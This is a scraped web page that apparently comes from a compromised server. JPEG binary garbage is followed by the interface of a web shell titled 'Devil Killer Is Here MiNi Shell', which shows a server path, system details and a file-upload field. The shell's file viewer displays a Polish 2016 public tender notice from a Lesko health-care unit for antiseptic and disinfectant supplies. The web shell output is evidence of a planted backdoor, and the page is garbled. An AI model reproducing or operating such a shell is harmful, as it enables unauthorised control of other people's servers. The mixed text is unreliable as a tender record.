JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/41103-N-2016.html

<p class="kh_header"><b>Lesko: środki  antyseptyczne  i dezynfekcyjne</b><br>
<b>Numer ogłoszenia: 41103 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Kazimierza Wielkiego 4, 38-600 Lesko, woj. podkarpackie, tel. 13 4696408 w. 14, faks 13 4696408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozlesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> środki  antyseptyczne  i dezynfekcyjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Mycie i dezynfekcja rąk.  Dezynfekcja skóry przed iniekcjami, zabiegami. Pielęgnacja skóry rąk. Dezynfekcja i mycie narzędzi chirurgicznych, powierzchni i sprzętu medycznego. Mycie i dezynfekcja rąk. Mycie i dezynfekcja powierzchni i sprzętu medycznego. Chusteczki do dezynfekcji sprzętu medycznego.  Dezynfekcja ran, błon śluzowych i skóry. Dezynfekcja i mycie narzędzi, sprzętu medycznego i powierzchni. Preparaty myjące i dezynfekcyjne  polecane przez producenta myjni  BHT,  kompatybilne ze sobą (jednego producenta). Chusteczki dezynfekcyjne. Wanny dezynfekcyjne. - szczegóły parametrowe i ilościowe  zawarte w załącznik nr 2
W zakresie preparatów zakwalifikowanych do grupy produktów leczniczych zgodnie z ustawą z dnia 6 września  2001r. Prawo Farmaceutyczne( Dz.U. 2008 Nr 45 poz.271 wraz z późn. zmianami) - pozwolenie na dopuszczenie do obrotu produktu leczniczego wydane przez Ministerstwo Zdrowia- w celu potwierdzenia żądanego spektrum działania oraz składu chemicznego, w tym substancji czynnych charakterystykę produktu leczniczego; etykietę i ulotkę informacyjną  zatwierdzoną  przez Ministra Zdrowia. W zakresie preparatów zakwalifikowanych do grupy wyrobów medycznych zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010r. (Dz.U.2010 Nr 107,poz.679 wraz z późn. zmianami) Pisemne oświadczenie Wykonawcy o posiadaniu:
- deklaracji zgodności dla wyrobów medycznych klasy I (preparaty do mycia i neutralizacji) oraz klasy IIa  (preparaty do mycia i dezynfekcji powierzchni) klasy IIb (preparat do dezynfekcji nieinwazyjnej sprzętu medycznego)- certyfikatu CE oraz Deklaracji zgodności lub Świadectwa zgłoszenia( wpis) w Urzędzie Rejestracji Produktów Leczniczych,Wyrobów Medycznych i Produktów Biobójczych dla wyrobów medycznych  klasy IIb (preparaty do dezynfekcji inwazyjnej sprzętu medycznego,narzędzi chirurgicznych i  endoskopów) Zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom tj.: dokumenty potwierdzające wykonane badanie, oznaczające że produkt  (będący przedmiotem zamówienia) został przebadany na organizmach testowych  podanych poniżej i odpowiada Normom Europejskim
dotyczącym obszaru medycznego (normy, co najmniej II fazy) lub Normom Polskim dotyczącym obszaru medycznego (normy, co najmniej II fazy). 
a) bakteriobójcze (B) Staphylococcus aureus, Pseudomonas aeruginosa, Enterococcus hirae b) prątkobójcze (Tbc) Mycobacterium Terrae i Mycobacterium avium c) grzybobójcze (F) Candida albicans, Aspergillus niger d) wirusobójcze (V) Poliovirus, Adenowirus  e) sporobójcze (S) Bacillus subtilis,  Bacillus cereus, Clostridium sporogenes  Uwaga ! W przypadku, gdy zaoferowany produkt znajduje się na liście Narodowego Instytutu Zdrowia Publicznego Państwowy Zakład Higieny Wykonawca nie ma obowiązku dołączyć dokumentów potwierdzających wykonanie  ww. badań. Wykonawca w tym zakresie będzie zobowiązany złożyć stosowne oświadczenie w ofercie, że  zaoferowany produkt znajduje się na ww. liście.
W zakresie preparatów zakwalifikowanych do grupy kosmetyków - zgodnie z ustawą z dnia 30-03-2001 o kosmetykach (Dz. U. 2001 Nr 42 poz. 473 z późn. zm.) - należy dołączyć: - pisemne oświadczenie wykonawcy. W zakresie preparatów zakwalifikowanych do grupy substancji chemicznych - zgodnie z ustawą z dnia 25-02-2011 o substancjach chemicznych i ich mieszaninach (Dz. U. 2011 Nr 63 poz. 322 z późn. zm.) - należy dołączyć: - pisemne oświadczenie wykonawcy W celu potwierdzenia żądanego spektrum działania oraz składu chemicznego, w tym substancji czynnych - charakterystykę produktu leczniczego; etykietę i ulotkę informacyjną do każdego preparatu Wymagania dotyczące równoważnika:
 a) dopuszcza się złożenie tylko jednej propozycji równoważnej odnośnie danej pozycji przedmiotu zamówienia z  obowiązkowym podaniem informacji o działaniu,  postaci i odpowiedniej wielkości opakowania, w opisie przedmiotu zamówienia,
c) wyliczona cena preparatu równoważnego będzie rozumiana jako cena wyliczona dla wartości opakowania  pierwotnie ujętego w specyfikacji. Zamawiający dopuszcza składanie ofert równoważnych. Preparat równoważny z oryginalnym to taki, który zawiera tą samą substancje aktywną, w tej samej dawce i postaci, uwalnianą in vitro z taką samą szybkością  i w tym samym  stopniu co preparat oryginalny.  W pozycji tej należy wówczas podać odpowiednią nazwę  handlową.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8, 33.19.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny  spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp  - zawarte w druku OFERTA zał. nr 1. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu: wykonawca składa oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp - zawarte w druku OFERTA zał nr 1, Ocena spełnienia warunków od wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny  spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp  - zawarte w druku OFERTA zał. nr 1. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu: wykonawca składa oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp - zawarte w druku OFERTA zał nr 1, Ocena spełnienia warunków od wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny  spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp  - zawarte w druku OFERTA zał. nr 1. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu: wykonawca składa oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp - zawarte w druku OFERTA zał nr 1, Ocena spełnienia warunków od wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny  spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp  - zawarte w druku OFERTA zał. nr 1. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu: wykonawca składa oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp - zawarte w druku OFERTA zał nr 1, Ocena spełnienia warunków od wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny  spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca złoży oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp  - zawarte w druku OFERTA zał. nr 1. Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu: wykonawca składa oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 uPzp - zawarte w druku OFERTA zał nr 1, Ocena spełnienia warunków od wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga, by Wykonawca: 
1. Wykonawca składa oświadczenie, , że  zaoferowane preparaty / środki antyseptyczne i dezynfekcyjne posiadają aktualne atesty i dokumenty dopuszczające do obrotu i stosowania zgodnie z  obowiązującymi przepisami prawa -  wykonawca składa pw. oświadczenie druk OFERTA zał nr 1  2. Oświadczam, iż posiadam/my zezwolenie na prowadzenie działalności gospodarczej w zakresie objętym  zamówieniem wydane przez  Głównego Inspektora Farmaceutycznego  -  wykonawca składa pw. oświadczenie druk OFERTA zał nr 1 3. Wykonawca jest zobowiązany załączyć kserokopię aktualnie obowiązującą  Kartę Charakterystyki Substancji Niebezpiecznej oferowanego produktu wraz z etykietą  i ulotkę  informacyjną.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany druk OFERTA a) wypełniony i podpisany formularz cenowy, b) opisy, foldery, katalogi, etykiety i ulotki informacyjne  do każdego oferowanego produktu,  c) Karty Charakterystyki Substancji Niebezpiecznej oferowanego produktu wraz z etykietą  i ulotkę  informacyjną d)   pełnomocnictwo - jeżeli zachodzi taka konieczność.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartych w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w razie:- w zakresie danych identyfikujących Strony umowy, takich jak np. firma, adres, rachunek bankowy, osoby upoważnione do kontaktów/odbioru lub inne zapisy dotyczące wskazania Stron,  numeru katalogowego produktu,  nazwy produktu przy zachowaniu  jego parametrów przedmiotowym  produkt zamienny, sposobu konfekcjonowania, liczby opakowań w sytuacji gdy:  - wprowadzony zostanie do sprzedaży przez wykonawcę produkt zmodyfikowany udoskonalony, - braku produktu na rynku i wprowadzenia na jego miejsce nowego, ulepszonego produktu, w przypadku kiedy cena przetargowa zostaje podtrzymana (między innymi sytuacje przerw w dostawie, wycofanie produktu z rynku, zaprzestanie produkcji  danego produktu), przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,- zmieni się liczba dostaw objętych zapotrzebowaniem Zamawiającego. Zamawiający zastrzega sobie możliwość zmian ilościowych poszczególnych opakowań(pojemności) danego  środka dezynfekcyjnego w ramach
umowy wynikające z bieżącego zapotrzebowania (w ramach  pakietu). Zamawiający zastrzega sobie możliwość wprowadzenia w czasie realizacji  umowy środka dezynfekcyjnego o identycznej substancji czynnej w przypadku zaistnienia sytuacji zaprzestania produkcji  preparatu, wycofania z produkcji bądź zaistnienia innych zdarzeń uniemożliwiających dostępność produktu dla zamawiającego, w cenie nie wyższej niż cena preparatów  wynikająca z oferty  wykonawcy. Powyższe zastrzeżenie nie stanowi zmiany treści umowy i nie wymaga aneksu do umowy.
Zamawiający zastrzega sobie możliwość niezrealizowania zapotrzebowania ilościowego określonego w przedmiocie zamówienia w  ilości 20%  z czego Wykonawcy nie przysługują jakiekolwiek roszczenia wobec Zamawiającego. Zamawiający zastrzega sobie prawo do wypowiedzenia zmian w obrębie asortymentu w ramach ustalonej wartości  zamówienia w zależności o potrzeb. W czasie obowiązywania umowy strony dopuszczają zmiany cen wyłącznie w przypadku :
a) zmiany stawek podatku VAT, przy czym zmianie ulega wyłącznie cena brutto, cena netto pozostaje bez zmian, b) zmiana cen, wprowadzonych rozporządzeniem odpowiedniego Ministra. Wskazane powyżej zmiany - wprowadzone przepisami powszechnie obowiązującymi, obowiązują od dnia  wejścia w życie tych przepisów.  
Zmiany te nie wymagają zawierania pisemnych aneksów do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozlesko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Lesku, 38-600 Lesko, ul. K. Wielkiego 4, pok. nr 225  budynek Przychodni lub strona internetowa zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 11:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Lesku,  38-600 Lesko, ul. K. Wielkiego 4, sekretariat  budynek Przychodni - pocztą, pocztą kurierska, osobiście.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mycie i dezynfekcja  rąk.  Dezynfekcja skóry przed  iniekcjami, zabiegami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawiera siwz zał nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pielęgnacja skóry rąk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w sizw zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dezynfekcja i mycie narzędzi chirurgicznych, powierzchni i sprzętu medycznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mycie i dezynfekcja rąk. Mycie i dezynfekcja powierzchni i sprzętu medycznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Termin płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Chusteczki do dezynfekcji sprzętu medycznego.  Dezynfekcja ran, błon śluzowych i skóry..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zawarty w siwz zał. nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-2.</p></li>
